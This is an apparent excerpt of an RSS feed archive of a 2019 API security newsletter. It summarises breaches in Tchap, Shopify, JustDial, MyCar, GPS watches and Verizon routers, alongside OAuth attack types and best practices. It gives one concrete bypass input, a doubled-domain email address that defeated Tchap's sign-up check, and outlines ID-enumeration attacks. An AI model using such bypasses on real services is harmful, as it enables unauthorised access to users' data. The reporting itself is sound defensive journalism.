<p>For a great as well as entertaining introduction to OAuth 2.0, <a href="https://www.youtube.com/watch?v=aIFRvSxIZ0k" target="_blank" rel="noopener">watch this brilliant video by Jim Manico</a>.</p>
<p>After that, <a href="https://habr.com/en/post/449182/" target="_blank" rel="noopener">check out these common OAuth 2.0 attack scenarios</a>:</p>
<ul>
<li>Authorization code reuse</li>
<li>Unvalidated redirect URI</li>
<li>Cross-site request forgery with OAuth Client</li>
<li>Access token as part of the URI</li>
</ul>
<p>See also OAuth 2.0 threat catalog and IETF best practices recommendations <a href="https://apisecurity.io/issue-7-oauth-attacks-vulnerabilities-drones-kids-watches/">in our earlier issue</a>.</p>
<h2>Threat landscape</h2>
<p>How long does it take for attackers to find your API and try to exploit it?</p>
<p><strong>Sophos set up honeypots</strong> in multiple cloud environments and data centers, collected data on them, <a href="https://www.cpomagazine.com/cyber-security/new-study-using-global-honeypots-reveals-frightening-speed-for-automated-hacking-of-default-credentials/" target="_blank" rel="noopener">and published their results</a>.</p>
<p>In one of the cases, it only took 52 seconds for the honeypot to be tried with credentials combinations like <code>admin</code>/<code>admin</code>!</p>
<p>The moral of the story?</p>
<ul>
<li>Security by obscurity simply does not work.</li>
<li>Don&#8217;t use easy or default user names and passwords.</li>
<li>Disable the interfaces you don&#8217;t need.</li>
<li>Use key-/certificate-/device-based authentication whenever possible.</li>
</ul>
<p>The post <a href="https://apisecurity.io/issue-29-oauth2-attacks-car-gps-vulnerabilities-honeypot-stats/">Issue 29: OAuth2 attacks, car GPS vulnerabilities, and honeypot stats</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 28: Breaches in Tchap, Shopify, and JustDial</title>
		<link>https://apisecurity.io/issue-28-breaches-tchap-shopify-justdial/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 25 Apr 2019 00:00:18 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=5906</guid>

					<description><![CDATA[<p>This week, we check out the details of the recent API vulnerabilities in Tchap, Shopify, and JustDial. Elsewhere, Gartner reports a whopping 77% increase in inquiries on API security. And finally, we take a look at how an API&#8217;s OpenAPI definition can be the foundation for API security. Vulnerabilities Tchap Tchap is a messaging app [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-28-breaches-tchap-shopify-justdial/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-28-breaches-tchap-shopify-justdial/">Issue 28: Breaches in Tchap, Shopify, and JustDial</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we check out the details of the recent API vulnerabilities in Tchap, Shopify, and JustDial. Elsewhere, Gartner reports a whopping 77% increase in inquiries on API security. And finally, we take a look at how an API&#8217;s OpenAPI definition can be the foundation for API security.</p>
<h2>Vulnerabilities</h2>
<h3>Tchap</h3>
<p>Tchap is a messaging app that the French government released for internal use. It was hailed as a more secure replacement for Telegram and WhatsApp. <a href="https://medium.com/@fs0c131y/tchap-the-super-not-secure-app-of-the-french-government-84b31517d144" target="_blank" rel="noopener">And ironically enough, it got hacked in just one hour</a>:</p>
<ol>
<li>The sign-up API had an email address parameter that didn&#8217;t validate the input format.</li>
<li>A security researcher, Elliot Alderson, submitted <code>fs0c131y@protonmail.com@elysee.fr</code> as the address.</li>
<li>The code simply verified that the address <em>ended</em> with <code>@elysee.fr</code>, which is a government email domain.</li>
<li>The check was successful, and Tchap sent a verification email that got delivered to <code>fs0c131y@protonmail.com</code> belonging to the attacker.</li>
<li>The attacker could click the confirmation link, get in, and be able to get into the internal government chat rooms.</li>
</ol>
<p>To prevent the attack, developers should have defined a strict regular expression for the email address field of their API and enforced the limitation.</p>
<h3>Shopify</h3>
<p>Ayoub Fathi found an Insecure Direct Object Reference (IDOR) vulnerability in the API of Shopify Exchange App. The issue — now fixed by Shopify — affected about 8,700 stores and exposed all their revenue and traffic data.</p>
<p>IDOR vulnerability is basically about the lack of authorization. Attackers register and get valid credentials for authentication. However, instead of just accessing their own records, attackers then modify API calls to access other users&#8217; data. For example, API calls might include some sort of ID parameter that attackers can modify to try various combinations. In this particular case, these were the online stores using Shopify that the researcher found through DNS.</p>
<p>Ayoub <a href="https://medium.com/bugbountywriteup/how-i-gained-access-to-revenue-and-traffic-data-of-thousands-of-shopify-stores-b6fe360cc369 " target="_blank" rel="noopener">published a very detailed write-up</a> including his scripts, the way he was doing DNS reverse lookups, and so on.</p>
<h3>JustDial</h3>
<p>India&#8217;s number one local search service, JustDial, <a href="https://thehackernews.com/2019/04/justdial-hacked-data-breach.html" target="_blank" rel="noopener">had an unprotected API that leaked personal data of all its 100 mln+ users</a>. Seems that when the company redesigned their apps, the old API was left running, unprotected, and with access to the user database.</p>
<p>Vulnerabilities like this one happen when companies pay attention to their applications but not to the underlying APIs. From JustDial&#8217;s perspective, their security was fine because their application was secure. The old API that still existed and had access to their data was simply not on their radar. Considering the wide adoption of API-based application architectures, this mindset needs to change in every company.</p>
<h2>Analysts and trends</h2>
<p>Gartner&#8217;s latest <a href="https://www.gartner.com/doc/3906990" target="_blank" rel="noopener">Application Security Testing magic quadrant report</a> has some interesting internal statistics. In 2018, Gartner observed:</p>
<ul>
<li>77% increase over the year on inquiries from end-user clients about API security</li>
<li>55% increase on inquiries about container security</li>
<li>34% increase on inquiries about DevSecOps</li>
</ul>
<h2>Tools</h2>
<p>TheNewStack is running my story on <a href="https://www.gartner.com/doc/3906990" target="_blank" rel="noopener">how developers can improve the security of their API contracts</a> by auditing the security of the OpenAPI definition of their API.</p>
<p>The post <a href="https://apisecurity.io/issue-28-breaches-tchap-shopify-justdial/">Issue 28: Breaches in Tchap, Shopify, and JustDial</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 27: MyCar vulnerability, serverless, IoT API security</title>
		<link>https://apisecurity.io/issue-27-mycar-vulnerability-serverless-iot-api-security/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 18 Apr 2019 00:00:28 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=5897</guid>

					<description><![CDATA[<p>This week, we had vulnerabilities in remote car control apps and GPS-enabled watches. We also take a look at the API security trends in microservices and serverless architectures, and consumer electronics. Vulnerabilities MyCar is a remote control system that is installed in some cars under its own name or under a variety of brands, such [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-27-mycar-vulnerability-serverless-iot-api-security/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-27-mycar-vulnerability-serverless-iot-api-security/">Issue 27: MyCar vulnerability, serverless, IoT API security</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we had vulnerabilities in remote car control apps and GPS-enabled watches. We also take a look at the API security trends in microservices and serverless architectures, and consumer electronics.</p>
<h2>Vulnerabilities</h2>
<p><strong>MyCar </strong>is a remote control system that is installed in some cars under its own name or under a variety of brands, such as  Carlink, Linkr, Visions MyCar, or MyCar Kia. The system has a mobile app that shows the location of your car and lets you remotely start and stop, or lock and unlock the vehicle. Needless to say, all this is done through APIs, and <a href="https://kb.cert.org/vuls/id/174715/" target="_blank" rel="noopener">the APIs in question had a huge vulnerability</a>. Individual user accounts were created with an API call that was made using admin credentials. These credentials were hard-coded inside the mobile app. Once attackers got the admin credentials from the code, they could control any car in the system.</p>
<p>Another <strong>GPS-enabled watch, Tic Toc Track</strong> from Australia, <a href="https://www.pentestpartners.com/security-blog/tic-toc-pwned/" target="_blank" rel="noopener">turned out to have flawed APIs security</a>. The issue was again Insecure Direct Object Reference (IDOR). Attackers could use any account to get access to the APIs. After that, they could simply enumerate the ID parameter when making API calls. There was no authorization check, so each new ID gave the attackers the access to another user&#8217;s device. The attackers could access all data of any user ( including location, full names, phone numbers&#8230;), substitute the shown GPS location, call the watch, and so on.</p>
<p>See more stories on API security flaws in other GPS-enabled watches in issues <a href="https://apisecurity.io/issue-7-oauth-attacks-vulnerabilities-drones-kids-watches/" target="_blank" rel="noopener">7</a>, <a href="https://apisecurity.io/issue-18-security-audits-for-your-api-contracts-google-limits-gmail-api-access/" target="_blank" rel="noopener">18</a>, <a href="https://apisecurity.io/issue-19-half-amazon-top-selling-smart-devices-found-vulnerable/" target="_blank" rel="noopener">19</a>, and <a href="https://apisecurity.io/issue-26-verizon-routers-patched-api-vulnerability/" target="_blank" rel="noopener">26</a>.</p>
<h2>Serverless architecture</h2>
<p>Microservices and serverless architectures are leading to proliferation of APIs. They are also changing the landscape of app and API security. Ory Segal and Amit Klein <a href="https://www.puresec.io/blog/the-evolution-of-application-security-in-the-serverless-world" target="_blank" rel="noopener">have published their discussion on what this means</a>:</p>
<ul>
<li>WAFs cannot make insecure apps secure.</li>
<li>Security needs to start from day 1.</li>
<li>Distributed nature makes analysis and protection harder, but gives new opportunities.</li>
</ul>
<h2>IoT and consumer devices</h2>
<p>A lot of consumer devices these days are managed using mobile apps calling REST APIs and connecting through home WiFi and a cloud backend. Andrew Useckas from ThreatX writes about the <a href="https://internetofthingsagenda.techtarget.com/blog/IoT-Agenda/Why-are-connected-device-risks-more-inherent-with-APIs" target="_blank" rel="noopener">risks that emerge with this approach and how to mitigate them</a>:</p>
<ul>
<li>Attacks against the devices themselves
<ul>
<li>Typically center on device identity</li>
<li>Solution: use individual secure keys</li>
</ul>
</li>
<li>Attacks against APIs
<ul>
<li>Emerge because the calls go through the internet</li>
<li>API JSON payloads are used to start all the usual API attack scenarios, such as SQL injections, cross-site scripting&#8230;</li>
<li>Solution: pay attention to the data definition quality for the API inputs (and outputs)</li>
</ul>
</li>
</ul>
<p>The post <a href="https://apisecurity.io/issue-27-mycar-vulnerability-serverless-iot-api-security/">Issue 27: MyCar vulnerability, serverless, IoT API security</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 26: Verizon routers patched for API vulnerability</title>
		<link>https://apisecurity.io/issue-26-verizon-routers-patched-api-vulnerability/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 11 Apr 2019 00:00:32 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=5882</guid>

					<description><![CDATA[<p>This week, Verizon has been patching their home routers, another GPS watch got breached, Shodan added an IoT monitoring service, and we take a look at API security best practices webinars and recommendations. Vulnerabilities Verizon is urgently updating their Verizon Fios Quantum Gateway home routers. Researchers from Tenable found multiple security issues in device&#8217;s API. [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-26-verizon-routers-patched-api-vulnerability/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-26-verizon-routers-patched-api-vulnerability/">Issue 26: Verizon routers patched for API vulnerability</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, Verizon has been patching their home routers, another GPS watch got breached, Shodan added an IoT monitoring service, and we take a look at API security best practices webinars and recommendations.</p>
<h2>Vulnerabilities</h2>
<p><strong>Verizon </strong>is urgently updating their Verizon Fios Quantum Gateway home routers. Researchers from Tenable <a href="https://threatpost.com/verizon-quantum-gateway-command-injection-flaw-impacts-millions/143606/" target="_blank" rel="noopener">found multiple security issues in device&#8217;s API</a>. For example, HTTPS was not enforced and some API call parameters were not sanitized. This enabled attackers to sniff logins, decrypt password from its hash, perform a command injection attack, and take control of the device.</p>
<p>More bad news on smartwatches: <strong>Vidimensio</strong> <strong>smartwatches</strong> are vulnerable to Insecure Direct Object Reference (IDOR) attacks. <a href="https://www.zdnet.com/article/researcher-prints-pwned-on-hundreds-of-gps-watches-maps-due-to-unfixed-api/" target="_blank" rel="noopener">Attackers can enumerate device IDs and make API calls for any of them</a>. The vendor has been ignoring the reports, so the researcher used the vulnerability itself to send a warning on it to some of the device users: he spoofed GPS coordinates to make the mobile app spell out the word &#8220;<em>pwned</em>&#8221; on the location map.</p>
<p>It&#8217;s starting to look like inexpensive smartwatches and GPS-enabled watches quite often lack API security. For more examples, see our earlier reports on discovered vulnerabilities in issues <a href="https://apisecurity.io/issue-7-oauth-attacks-vulnerabilities-drones-kids-watches/" target="_blank" rel="noopener">7</a>, <a href="https://apisecurity.io/issue-18-security-audits-for-your-api-contracts-google-limits-gmail-api-access/" target="_blank" rel="noopener">18</a>, and <a href="https://apisecurity.io/issue-19-half-amazon-top-selling-smart-devices-found-vulnerable/" target="_blank" rel="noopener">19</a>.</p>
<h2>Tools</h2>
<p>Shodan is a popular internet vulnerability scanner. Attackers and researchers have used it to discover <a href="https://apisecurity.io/issue-9-patch-kubernetes-and-nuuo-security-cameras-node-js-security-guide-http3/" target="_blank" rel="noopener">unprotected Elasticsearch instances</a>, <a href="https://apisecurity.io/issue-13-microsoft-services-chromecast-hacks-limitations-waf/">Chromecast devices</a>, printers, and more. To monetize the IoT scenario, Shodan has now <a href="https://www.darkreading.com/cloud/new-shodan-tool-warns-organizations-of-their-internet-exposed-devices/d/d-id/1334268" target="_blank" rel="noopener">launched a new Shodan Monitor service</a>. The service alerts organizations on any of their device APIs that have been left exposed on the public Internet.</p>
<h2>Best practices</h2>
<p><a href="https://www.twistlock.com/2019/03/21/five-best-practices-api-security/" target="_blank" rel="noopener">Five Best Practices for API Security</a> by Twistlock&#8217;s John Odey:</p>
<ol>
<li>Use authentication and authorization.</li>
<li>Encrypt API data.</li>
<li>Implement security on application layer.</li>
<li>Whitelist allowed accesses.</li>
<li>Log APIs.</li>
</ol>
<h2>Webinars</h2>
<p><strong>KuppingerCole </strong>has published the recording of their webinar on API security. The webinar <a href="https://www.kuppingercole.com/events/n40434" target="_blank" rel="noopener">&#8220;API Security: Separating Truth from Fiction&#8221;</a> was led by Alexei Balaganski and Isabelle Mauny. The webinar covers, for example:</p>
<ul>
<li>API standards</li>
<li>The scope of API security</li>
<li>Tooling</li>
<li>API strategy</li>
<li>Practical steps.</li>
</ul>
<p>You need to register (free) with KuppingerCole to watch the recording.</p>
<p>The post <a href="https://apisecurity.io/issue-26-verizon-routers-patched-api-vulnerability/">Issue 26: Verizon routers patched for API vulnerability</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 25: NIST microservices guidelines, Facebook opens up to pentesting</title>
		<link>https://apisecurity.io/issue-25-nist-microservices-guidelines-facebook-opens-pentesting/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 04 Apr 2019 00:00:39 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=5870</guid>

					<description><![CDATA[<p>This week, NIST has released their microservice security guidelines, Facebook has removed some of their security for whitehat researchers, and we continue the discussion on how to store API secrets safely. Industry standards and best practices US National Institute of Standards and Technology (NIST) published their draft on &#8220;Security Strategies for Microservices-based Application Systems&#8221;. The document includes [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-25-nist-microservices-guidelines-facebook-opens-pentesting/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-25-nist-microservices-guidelines-facebook-opens-pentesting/">Issue 25: NIST microservices guidelines, Facebook opens up to pentesting</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, NIST has released their microservice security guidelines, Facebook has removed some of their security for whitehat researchers, and we continue the discussion on how to store API secrets safely.</p>
<h2>Industry standards and best practices</h2>
<p>US National Institute of Standards and Technology (<strong>NIST</strong>) published their draft on <a href="https://csrc.nist.gov/publications/detail/sp/800-204/draft" target="_blank" rel="noopener">&#8220;Security Strategies for Microservices-based Application Systems&#8221;</a>. The document includes a lot of API security guidelines, architectures (such as gateways and service meshes), threat background, and security strategies.</p>
<p>The draft is open for commenting until April 26, 2019. Definitely worth checking out!</p>
<h2>Pentesting</h2>
<p><strong>Facebook </strong>has made an interesting move to make pentesting their APIs easier: researches can now <a href="https://www.zdnet.com/article/facebook-rolls-out-whitehat-settings-to-help-bug-hunters-analyze-traffic-in-its-mobile-apps/" target="_blank" rel="noopener">disable some of the API protection layers</a> that the company has put in place. This can be done under the Whitehat Settings in the Android apps for Facebook, Messenger, and Instagram.</p>
<p>The Whitehat Settings allow researchers do the following (for their own accounts only):</p>
<ul>
<li>Turn off Certificate Pinning</li>
<li>Use a built-in proxy for API calls</li>
<li>Disable TLS 1.3</li>
<li>Use user-installed certificates</li>
</ul>
<p>As we all know, API security is all about layers. By allowing researchers to disable some of the layers, Facebook is making it easier to test the other ones.</p>
<h2>API keys: the saga continues</h2>
<p><a href="https://apisecurity.io/issue-24-unprotected-apis-implants-storing-api-secrets/" target="_blank" rel="noopener">In our previous issue</a>, we covered a recent research that found more than 100,000 public repositories that had API keys stored in the clear.</p>
<p><a href="https://securityledger.com/2019/03/podcast-episode-139-the-state-of-right-to-repair-and-api-insecurity-on-github/" target="_blank" rel="noopener">The latest <strong>Security Ledger podcast</strong></a> has Paul Roberts and Dmitry Sotnikov discussing that story. They also talk about the best practices for storing secrets and what developers can do about it.</p>
<p>GitHub&#8217;s main competitor, <strong>GitLab</strong>, is also <a href="https://thenextweb.com/dd/2019/03/22/gitlab-now-automatically-warns-against-merging-api-keys-into-your-codebase/" target="_blank" rel="noopener">adding key detection to code merges</a>. Not a silver bullet, as only a subset gets detected, but every step in that direction helps!</p>
<h2>Vendors</h2>
<p>On April 9, <strong>Smartbear </strong>is hosting <a href="https://smartbear.com/resources/webinars/shifting-api-security-testing-left/?utm_medium=apisecurity.io&amp;utm_source=apisecurity.io&amp;utm_campaign=apisecurity.io" target="_blank" rel="noopener">a webinar about dev role in API security</a>. The webinar will cover:</p>
<ul>
<li>General overview of web security</li>
<li>API security best practices</li>
<li>An introduction to SecOps</li>
<li>A demo on how Smartbear Secure Pro finds defects in APIs</li>
</ul>
<p>The post <a href="https://apisecurity.io/issue-25-nist-microservices-guidelines-facebook-opens-pentesting/">Issue 25: NIST microservices guidelines, Facebook opens up to pentesting</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 24: Unprotected APIs in implants, storing API secrets</title>
		<link>https://apisecurity.io/issue-24-unprotected-apis-implants-storing-api-secrets/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 28 Mar 2019 00:00:10 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=5859</guid>

					<description><![CDATA[<p>This week, we dive under the skin with unprotected APIs on implanted cardiac defibrillators, and take a spin with a hacked tornado warning system in Texas. We have a story on how Uber used API vulnerability to drive competition out of business. And finally, we also look into how to store API keys and prevent [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-24-unprotected-apis-implants-storing-api-secrets/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-24-unprotected-apis-implants-storing-api-secrets/">Issue 24: Unprotected APIs in implants, storing API secrets</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we dive under the skin with unprotected APIs on implanted cardiac defibrillators, and take a spin with a hacked tornado warning system in Texas. We have a story on how Uber used API vulnerability to drive competition out of business. And finally, we also look into how to store API keys and prevent SQL injections.</p>
<h2>Vulnerabilities</h2>
<p>IoT security as bad as it gets: 750 000 <strong>implanted cardiac defibrillators</strong> from Medtronic <a href="https://www.techtimes.com/articles/240246/20190325/medtronic-admits-hackers-can-take-over-implanted-cardiac-defibrillators.htm" target="_blank" rel="noopener">have unprotected APIs</a>! Even U.S. Department of Homeland Security <a href="https://ics-cert.us-cert.gov/advisories/ICSMA-19-080-01" target="_blank" rel="noopener">had to issue a warning</a> on this one.</p>
<p>Emergency warning systems have unprotected APIs as well. Two cities in Texas had their <strong>tornado warning systems</strong> hacked to send alarms in the middle of the night, and by as simple an attack as sending a radio signal. Turns out that there is no security on these interfaces: you just need to know the radio signal that the system expects. See <a href="https://www.reddit.com/r/Dallas/comments/b2xypg/hacked_tornado_sirens_taken_offline_in_two_texas/" target="_blank" rel="noopener">this Reddit discussion</a> for more details.</p>
<h2>Best Practices</h2>
<p>Never put your <strong>secrets in your source code</strong>. Researchers at North Carolina State University found over 100 000 repositories on GitHub that contained API keys and cryptographic keys. The repos in question are public, so anyone can use the keys to take over the accounts. Here is <a href="https://www.ndss-symposium.org/wp-content/uploads/2019/02/ndss2019_04B-3_Meli_paper.pdf" target="_blank" rel="noopener">the full report,</a> and a <a href="https://www.zdnet.com/article/over-100000-github-repos-have-leaked-api-or-cryptographic-keys/" target="_blank" rel="noopener">quick summary in ZDNet</a>.</p>
<p><strong>GitHub </strong>is working on their <a href="https://help.github.com/en/articles/about-token-scanning" target="_blank" rel="noopener">Token Scanning</a> tool to somewhat mitigate the issue. However, the tool only checks a few token formats for the most widely used services: AWS, Azure, GCloud, GitHub, Slack, and Stripe.</p>
<p><strong>Kubernetes </strong>is also <a href="https://thenewstack.io/no-more-forever-tokens-changes-in-identity-management-for-kubernetes/" target="_blank" rel="noopener">working on improving their storage for secrets</a>. It is already in its alpha form in version 1.13, with the release planned for v1.16. The improvements include:</p>
<ul>
<li>No more forever tokens.</li>
<li>No secrets in environments.</li>
<li>Keys auto-expire on pod restarts.</li>
<li>Tokens are bound to specific services.</li>
</ul>
<h2>Business Impact</h2>
<p>Here&#8217;s an example of how lack of API security can damage your business, <a href="https://apisecurity.io/issue-23-hacking-ml-aws-gateway-security-gartner-advice-ciso/" target="_blank" rel="noopener">again</a> from Down Under. In Australia, <a href="https://securityboulevard.com/2019/03/did-uber-spyware-on-rival-taxi-firm-yes-and-no/" target="_blank" rel="noopener">Uber reportedly used unprotected APIs of a local rival, GoCatch</a>, that gave information about the drivers and their location. Uber collected the information, contacted the drivers, and lured them away from the competitor into their own ranks.</p>
<h2>Tech 101</h2>
<p><a href="https://securityboulevard.com/2019/03/did-uber-spyware-on-rival-taxi-firm-yes-and-no/" target="_blank" rel="noopener">Here&#8217;s a great educational video</a> about <strong>SQL injections </strong>by Computerphile. He is using a PHP site as an example. However, everything he shows equally applies to REST interface parameters and JSON payloads as well. Lock down, sanitize, and escape your inputs!</p>
<p>The post <a href="https://apisecurity.io/issue-24-unprotected-apis-implants-storing-api-secrets/">Issue 24: Unprotected APIs in implants, storing API secrets</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 23: Hacking ML, AWS Gateway Security, Gartner advice to CISO</title>
		<link>https://apisecurity.io/issue-23-hacking-ml-aws-gateway-security-gartner-advice-ciso/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 21 Mar 2019 00:00:47 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=5845</guid>

					<description><![CDATA[<p>This week, we had another mobile app leaking user data, and the first ever CEO resignation because of an API breach. There&#8217;s also: The best practices for AWS API Gateway security Gartner&#8217;s advice to CISOs on cloud security Security implications of the OpenAPI Specification (OAS) Vulnerabilities in machine learning Vulnerabilities The mobile application 63red Safe had [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-23-hacking-ml-aws-gateway-security-gartner-advice-ciso/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-23-hacking-ml-aws-gateway-security-gartner-advice-ciso/">Issue 23: Hacking ML, AWS Gateway Security, Gartner advice to CISO</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we had another mobile app leaking user data, and the first ever CEO resignation because of an API breach. There&#8217;s also:</p>
<ul>
<li>The best practices for AWS API Gateway security</li>
<li>Gartner&#8217;s advice to CISOs on cloud security</li>
<li>Security implications of the OpenAPI Specification (OAS)</li>
<li>Vulnerabilities in machine learning</li>
</ul>
<h2>Vulnerabilities</h2>
<p><strong>The mobile application 63red Safe </strong> had <a href="https://www.zdnet.com/article/yelp-for-conservatives-maga-app-leaks-users-data/" target="_blank" rel="noopener">an API breach</a>. This app is a Yelp-like app for US conservatives. A security researcher found the credentials of the app&#8217;s author included in the app&#8217;s source code. The code also had a list of API endpoints for storing or retrieving data. The backend APIs in question didn&#8217;t use any form of authentication. Anyone could look at the app&#8217;s source code, get the credentials, get the API endpoints, and extract data from the app&#8217;s server with no challenge or restriction.</p>
<h2>Lessons Learnt</h2>
<p>New details emerge from <strong>the LandMark White breach</strong> that <a href="https://apisecurity.io/issue-21-amazon-ring-doorbell-camera-hacked-open-apis-coming-healthcare/" target="_blank" rel="noopener">we covered in issue 21 in early March</a>.</p>
<p>LandMark White used to be Australia&#8217;s largest independent property valuation and consultancy firm, and their APIs were used by all major banks in Australia. Now, the company is in crisis. Major customers have left and <a href="https://www.programmableweb.com/news/massive-api-breach-claims-new-victim-ceo/analysis/2019/03/15" target="_blank" rel="noopener">several executives have had to step down</a>.</p>
<p>It turns out that some teams at Landmark White actually <a href="https://www.afr.com/real-estate/landmarkwhite-knew-of-it-weakness-in-2017-a-year-before-data-breach-20190308-h1c5vr" target="_blank" rel="noopener">knew about the API vulnerability</a> before the breach happened, and for about 18 months at that! The information just never reached the right people. Talk about the importance of a shared view on the state of API security in your company.</p>
<h2>Best Practices</h2>
<p>Daria Kirilenko from <strong>Gartner </strong>provides the following <a href="https://www.techrepublic.com/article/how-to-help-cisos-understand-their-role-in-cloud-security/" target="_blank" rel="noopener"><strong>advice to chief information security officers (CISOs)</strong> on cloud security</a>:</p>
<ol>
<li>Understand that cloud security is shared between vendors and your internal team.</li>
<li>Build a cloud security team.</li>
<li>Build an internal common security platform for APIs and different reference architectures.</li>
</ol>
<p>Ory Segal, CTO of PureSec, <a href="https://www.puresec.io/blog/aws-security-best-practices-for-api-gateway" target="_blank" rel="noopener">shares his <strong>security best practices for AWS API Gateway</strong></a>:</p>
<ol>
<li>Use different types of APIs for different types of access:
<ul>
<li>Public</li>
<li>Authenticated</li>
<li>Internal</li>
</ul>
</li>
<li>Use the access control mechanisms on offer to control the access to your APIs:
<ul>
<li>API keys</li>
<li>AWS IAM roles and policies</li>
<li>Amazon Cognito</li>
<li>AWS Lambda authorizer functions</li>
</ul>
</li>
</ol>
<h2>Technology Overview</h2>
<p><a href="https://jaxenter.com/audit-api-security-tutorial-156411.html" target="_blank" rel="noopener"> JAXenter is running my story</a> on why API security is hard, what makes <strong>OpenAPI Specification</strong> so attractive, and how the free API Contract Security Audit tool comes in handy.</p>
<h2>Research</h2>
<p>Nicholas Carlini from Google demonstrated <strong>hacking machine learning (ML) by tweaking the input signal</strong>. For example, he caused the algorithm to report guacamole when actually shown a cat image, and &#8216;think&#8217; it was hearing a Charles Dickens text narration when in reality (tweaked) Bach music was playing.</p>
<p><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-5854" src="https://apisecurity.io/wp-content/uploads/2019/03/cat-or-guacamole.jpg" alt="" width="800" height="306" /></p>
<p>This is fascinating because so many security solutions these day rely almost 100% on ML or AI. See the <a href="https://threatpost.com/machine-learning-dark-side/142616/" target="_blank" rel="noopener">summary from his RSAC session</a> or check out <a href="https://arxiv.org/pdf/1801.01944.pdf" target="_blank" rel="noopener">the full paper</a>.</p>
<p>The post <a href="https://apisecurity.io/issue-23-hacking-ml-aws-gateway-security-gartner-advice-ciso/">Issue 23: Hacking ML, AWS Gateway Security, Gartner advice to CISO</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 22: SANS SWAT list, 42Crunch Platform launch</title>
		<link>https://apisecurity.io/issue-22-sans-swat-list-42crunch-platform-launch/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 14 Mar 2019 00:00:50 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=5834</guid>

					<description><![CDATA[<p>This week, we have seen vulnerabilities in 3 million car alarms, snowboard helmets, and virtual worlds. In other news, there is a new API security platform built around OpenAPI contracts. We also take a look at the SANS checklists and HTTPS/TLS tutorials. Vulnerabilities This was a good week for PenTestPartners. They have uncovered a couple [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-22-sans-swat-list-42crunch-platform-launch/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-22-sans-swat-list-42crunch-platform-launch/">Issue 22: SANS SWAT list, 42Crunch Platform launch</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have seen vulnerabilities in 3 million car alarms, snowboard helmets, and virtual worlds. In other news, there is a new API security platform built around OpenAPI contracts. We also take a look at the SANS checklists and HTTPS/TLS tutorials.</p>
<h2>Vulnerabilities</h2>
<p>This was a good week for PenTestPartners. They have uncovered a couple of serious API vulnerabilities:</p>
